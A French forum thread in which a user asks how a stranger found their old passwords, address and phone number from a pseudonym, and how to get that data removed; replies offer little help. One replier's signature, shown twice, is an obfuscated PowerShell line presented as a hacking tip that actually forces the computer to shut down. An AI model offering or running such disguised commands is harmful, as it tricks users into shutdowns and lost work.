Annonce

Réduire
Aucune annonce.

Supprimer des informations personnelles

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Supprimer des informations personnelles

    Bonjour à tous,

    Récemment, une personne a retrouvé en quelques secondes à partir de l'un de mes pseudonymes des vieilles informations me concernant (mot de passes, adresses, téléphone..)
    Etant complètement novice en la matière, j'ai essayé de retrouver ces informations afin de les supprimer, en premier lieu en utilisant Google, qui n'a donné aucun résultat, puis en essayant un outil de dox, qui n'a pas été utile non plus.

    Quelqu'un connaitrait-il la méthode qu'il a utilisé ? Si ces informations apparaissent en clair sur un site, j'aimerai essayer de contacter le webmaster pour les supprimer (on peut toujours rêver), ou au moins connaître quelles infos ont été diffusées

    Je vous remercie

  • #2
    Salut.

    C'est "Machinchose" le pseudonyme en question ? Sinon on ne risque pas de pouvoir t'aider beaucoup.
    Tu disposes d'un blog ? d'un site à toi ?

    Cordialement,
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Bonjour,

      Non, il ne s'agit pas de ce pseudonyme : je n'ai pas envie d'afficher au grand jour le pseudo qui permet de retrouver toutes ces informations personnelles
      Je ne dispose pas de blog ou de site lié à ce pseudonyme.

      La personne m'a parlé de CDIscount (nous chattions lorsqu'elle a trouvé ces infos). J'ignore si elle a trouvé le mot de passe lui permettant de se connecter à mon compte CDiscount et qu'elle a alors pu obtenir de nouvelles infos, ou si c'est via ce site qu'elle les a obtenu au début. CDiscount a t-il subi un jour une attaque qui aurait dévoilé les identifiants des utilisateurs ?

      Commentaire


      • #4
        Manque de contexte : bon courage pour tes recherches
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire

        Chargement...
        X